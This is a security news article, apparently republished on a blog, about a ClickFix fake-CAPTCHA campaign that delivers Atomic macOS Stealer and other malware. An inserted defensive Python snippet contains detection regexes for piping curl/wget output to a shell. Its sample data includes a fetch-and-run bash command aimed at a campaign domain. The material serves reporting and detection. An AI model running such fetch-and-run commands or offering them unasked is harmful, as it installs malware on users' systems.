    New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users

    By big tee tech hub | June 7, 2025 | 5 Mins Read

    Cybersecurity researchers are alerting to a new malware campaign that employs the ClickFix social engineering tactic to trick users into downloading an information stealer malware known as Atomic macOS Stealer (AMOS) on Apple macOS systems.

    The campaign, according to CloudSEK, has been found to leverage typosquat domains mimicking U.S.-based telecom provider Spectrum.

    “macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation,” security researcher Koushik Pal said in a report published this week. “The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries.”

    It’s believed that the activity is the work of Russian-speaking cybercriminals owing to the presence of Russian language comments in the malware’s source code.

    The starting point of the attack is a web page that impersonates Spectrum (“panel-spectrum[.]net” or “spectrum-ticket[.]net”). Visitors to the sites in question are served a message that instructs them to complete an hCaptcha verification check in order to “review the security” of their connection before proceeding further.

    However, when the user clicks the “I am human” checkbox for evaluation, they are displayed an error message stating “CAPTCHA verification failed,” urging them to click a button to go ahead with an “Alternative Verification.”

    Doing so causes a command to be copied to the user’s clipboard, and the victim is shown a set of instructions depending on their operating system. On Windows, they are guided to open the Windows Run dialog and run a PowerShell command; on macOS, the command is instead a shell script that is executed by launching the Terminal app.

    The shell script, for its part, prompts users to enter their system password and downloads a next-stage payload, in this case, a known stealer called Atomic Stealer.

    “Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure,” Pal said.

    “The delivery pages in question for this AMOS variant campaign contained inaccuracies in both its programming and front-end logic. For Linux user agents, a PowerShell command was copied. Furthermore, the instruction ‘Press & hold the Windows Key + R’ was displayed to both Windows and Mac users.”
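A defender-side triage of executed command lines for the traits described above, as an added example that is not from the article or the CloudSEK report. The regex heuristics, trait names and sample command lines are constructed assumptions; only the two domains come from the article.

```python
import re
from urllib.parse import urlsplit

# Typosquat domains named in the article, refanged for matching.
CAMPAIGN_DOMAINS = ("panel-spectrum.net", "spectrum-ticket.net")

# Heuristics chosen for this example (assumptions, not indicators from the report).
FETCH_PIPED_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b")
SHELL_RUNS_FETCH = re.compile(
    r"\b(?:ba|z)?sh\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b")
POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
URL = re.compile(r"https?://[^\s\"')]+", re.I)


def url_hosts(command):
    """Return the lower-cased hostname of every URL in a command line."""
    return [urlsplit(u).hostname or "" for u in URL.findall(command)]


def clickfix_findings(command, host_os):
    """List the ClickFix-style traits present in one executed command line."""
    findings = []
    if FETCH_PIPED_TO_SHELL.search(command):
        findings.append("fetch_piped_to_shell")
    if SHELL_RUNS_FETCH.search(command):
        findings.append("shell_runs_fetched_script")
    # The article notes a PowerShell command was copied for Linux user agents,
    # so a PowerShell invocation on a non-Windows host is worth a look.
    if host_os != "windows" and POWERSHELL.search(command):
        findings.append("powershell_on_non_windows")
    for host in url_hosts(command):
        if any(host == d or host.endswith("." + d) for d in CAMPAIGN_DOMAINS):
            findings.append("campaign_domain")
            break
    return findings


# Constructed telemetry: (host OS, command line). Paths are placeholders.
SAMPLES = [
    ("macos", '/bin/bash -c "$(curl -fsSL https://panel-spectrum.net/PLACEHOLDER)"'),
    ("macos", "curl -s https://downloads.example.test/setup.sh | sh"),
    ("linux", 'powershell -NoProfile -Command "Get-Date"'),
    ("macos", "brew update && brew upgrade"),
]

if __name__ == "__main__":
    for host_os, cmd in SAMPLES:
        print(host_os, clickfix_findings(cmd, host_os), cmd)
```

Fetch-and-run one-liners are also used by legitimate installers, so these traits are triage signals to weigh alongside the parent process and destination, not verdicts.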

    The disclosure comes amid a surge in campaigns using the ClickFix tactic to deliver a wide range of malware families over the past year.

    “Actors carrying out these targeted attacks typically utilize similar techniques, tools, and procedures (TTPs) to gain initial access,” Darktrace said. “These include spear phishing attacks, drive-by compromises, or exploiting trust in familiar online platforms, such as GitHub, to deliver malicious payloads.”

    The links distributed using these vectors typically redirect the end user to a malicious URL that displays a fake CAPTCHA verification check in an attempt to deceive users into thinking that they are carrying out something innocuous, when, in reality, they are guided to execute malicious commands to fix a non-existent issue.

    The end result of this effective social engineering method is that users end up compromising their own systems, enabling threat actors to bypass security controls.

    The cybersecurity company said it identified multiple ClickFix attacks across customer environments in Europe, the Middle East, and Africa (EMEA), and in the United States. And these campaigns are gaining steam, adopting several variations but operating with the same end goal of delivering malicious payloads, ranging from trojans to stealers to ransomware.

    Earlier this week, Cofense outlined an email phishing campaign that spoofs Booking.com, targeting hotel chains and the food services sector with fake CAPTCHAs that lead to XWorm RAT, PureLogs Stealer, and DanaBot. The fact that ClickFix is flexible and easy to adapt makes it an attractive malware distribution mechanism.

    “While the exact email structure varies from sample to sample, these campaigns generally provide Booking[.]com-spoofing emails with embedded links to a ClickFix fake CAPTCHA site which is used to deliver a malicious script that runs RATs and/or information stealers,” Cofense said.

    The email security firm said it has also observed ClickFix samples mimicking cookie consent banners, wherein clicking on the “Accept” button causes a malicious script file to be downloaded. The user is subsequently prompted to run the script to accept cookies.

    In one April 2025 incident analyzed by Darktrace, unknown threat actors were found to utilize ClickFix as an attack vector to download nondescript payloads to burrow deeper into the target environment, conduct lateral movement, send system-related information to an external server via an HTTP POST request, and ultimately exfiltrate data.

    “ClickFix baiting is a widely used tactic in which threat actors exploit human error to bypass security defenses,” Darktrace said. “By tricking endpoint users into performing seemingly harmless, everyday actions, attackers gain initial access to systems where they can access and exfiltrate sensitive data.”

    Other ClickFix attacks have employed phony versions of other popular CAPTCHA services like Google reCAPTCHA and Cloudflare Turnstile for malware delivery under the guise of routine security checks.

    These fake pages are “pixel-perfect copies” of their legitimate counterparts, sometimes even injected into real-but-hacked websites to trick unsuspecting users. Stealers such as Lumma and StealC, as well as full-fledged remote access trojans (RATs) like NetSupport RAT are some of the payloads distributed via bogus Turnstile pages.

    “Modern internet users are inundated with spam checks, CAPTCHAs, and security prompts on websites, and they’ve been conditioned to click through these as quickly as possible,” SlashNext’s Daniel Kelley said. “Attackers exploit this ‘verification fatigue,’ knowing that many users will comply with whatever steps are presented if it looks routine.”
